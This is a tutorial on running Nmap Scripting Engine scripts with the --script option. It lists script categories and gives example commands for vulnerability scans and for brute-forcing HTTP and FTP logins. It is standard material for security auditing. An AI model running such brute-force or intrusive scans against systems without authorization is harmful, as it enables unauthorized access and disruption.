How to Execute Scripts (`--script` Option) with Nmap

Introduction

Nmap (Network Mapper) is a powerful and widely used network scanning tool that allows security professionals, administrators, and ethical hackers to discover hosts, services, and vulnerabilities on a network. One of its most powerful features is the ability to run scripts through the Nmap Scripting Engine (NSE) using the --script option.

NSE scripts can automate various tasks, including:

• Service version detection
• Vulnerability scanning
• Network auditing
• Exploit attempts and detection
• Authentication bypass checks

This article will provide a comprehensive guide on how to execute scripts using the --script option in Nmap, including syntax, script categories, usage examples, and best practices.

Understanding the Nmap Scripting Engine (NSE)

The Nmap Scripting Engine (NSE) extends Nmap’s functionality by allowing users to run Lua-based scripts. These scripts are categorized based on their purpose and execution stage:

Script Categories

1. auth – Scripts related to authentication mechanisms.
2. broadcast – Scripts that discover hosts using broadcast methods.
3. brute – Scripts that perform brute-force attacks against authentication mechanisms.
4. default – Scripts run with -sC (equivalent to --script=default).
5. discovery – Scripts that gather additional information about the target.
6. dos – Scripts that test for Denial of Service (DoS) vulnerabilities.
7. exploit – Scripts that attempt to exploit known vulnerabilities.
8. external – Scripts that require external services or APIs.
9. fuzzer – Scripts that perform fuzz testing.
10. intrusive – Scripts that may disrupt services or alert intrusion detection systems.
11. malware – Scripts that detect malware-infected systems.
12. safe – Scripts that perform safe and non-intrusive operations.
13. version – Scripts that enhance service version detection.
14. vuln – Scripts that check for known vulnerabilities.

Each NSE script is stored in Nmap’s script directory (e.g., /usr/share/nmap/scripts/ on Linux and C:\Program Files (x86)\Nmap\scripts\ on Windows).

How to Use the --script Option

The --script option is used to specify one or more NSE scripts to run during a scan. The basic syntax is:

nmap --script <script-name> <target>

Running a Single Script

To run a single script, specify its name without the .nse extension:

nmap --script http-title scanme.nmap.org

This command retrieves the title of the webpage hosted on scanme.nmap.org.

Running Multiple Scripts

You can specify multiple scripts separated by commas:

nmap --script=ssl-heartbleed,http-title <target>

This runs both the ssl-heartbleed and http-title scripts.

Running Scripts by Category

Instead of specifying individual scripts, you can run all scripts in a category:

nmap --script=vuln <target>

This runs all vulnerability detection scripts against the specified target.

Running Scripts with Arguments

Some NSE scripts require or support additional arguments. These can be specified using the --script-args option:

nmap --script http-brute --script-args userdb=users.txt,passdb=passwords.txt <target>

This command performs an HTTP brute-force attack using user and password lists.

Running All Default Scripts

Nmap has a -sC option, which is equivalent to --script=default:

nmap -sC <target>

This executes all scripts in the default category.

Practical Examples

1. Discovering HTTP Server Titles

nmap --script http-title 192.168.1.1

This retrieves the title of web pages hosted on 192.168.1.1.

2. Detecting SSL Vulnerabilities

nmap --script ssl-enum-ciphers 192.168.1.1

This checks for weak SSL/TLS ciphers.

3. Checking for Open Ports and Services

nmap -sV --script=version <target>

This runs service version detection along with NSE scripts in the version category.

4. Brute-Forcing FTP Authentication

nmap --script ftp-brute --script-args userdb=users.txt,passdb=passwords.txt 192.168.1.1

This attempts to brute-force the FTP login.

5. Running All Vulnerability Scripts

nmap --script=vuln 192.168.1.1

This executes all scripts that check for vulnerabilities.

Managing and Updating NSE Scripts

To keep NSE scripts updated, use the following command:

nmap --script-updatedb

This updates the script database to include the latest NSE scripts from the Nmap repository.

Locating NSE Scripts

To find the location of installed scripts, run:

locate *.nse

On Windows, use:

dir "C:\Program Files (x86)\Nmap\scripts\" /B

Downloading and Installing Custom Scripts

If you find a third-party NSE script online, you can manually install it:

1. Download the script and save it in the Nmap scripts directory.

2. Run the update command:

   nmap --script-updatedb
   

3. Execute the script:

   nmap --script <script-name> <target>
   

Best Practices

1. Use NSE Scripts Responsibly – Some scripts can be intrusive and may trigger security alarms.
2. Verify Scripts Before Running – Ensure third-party scripts are safe before executing them.
3. Avoid Overloading the Network – Running multiple aggressive scripts can cause network slowdowns.
4. Update Scripts Regularly – Keep your script database updated for the latest vulnerability checks.
5. Test in a Controlled Environment – Run potentially harmful scripts in a test network before using them in production.

Conclusion

The --script option in Nmap provides powerful automation capabilities for network scanning and security assessments. By leveraging the Nmap Scripting Engine, users can perform in-depth vulnerability scanning, brute-force testing, service detection, and more. Understanding how to execute, manage, and update NSE scripts ensures that your network reconnaissance is effective, efficient, and secure.

By following best practices, you can maximize the benefits of NSE while minimizing potential risks. Whether you are an ethical hacker, network administrator, or security researcher, mastering the --script option in Nmap is an essential skill for advanced network analysis.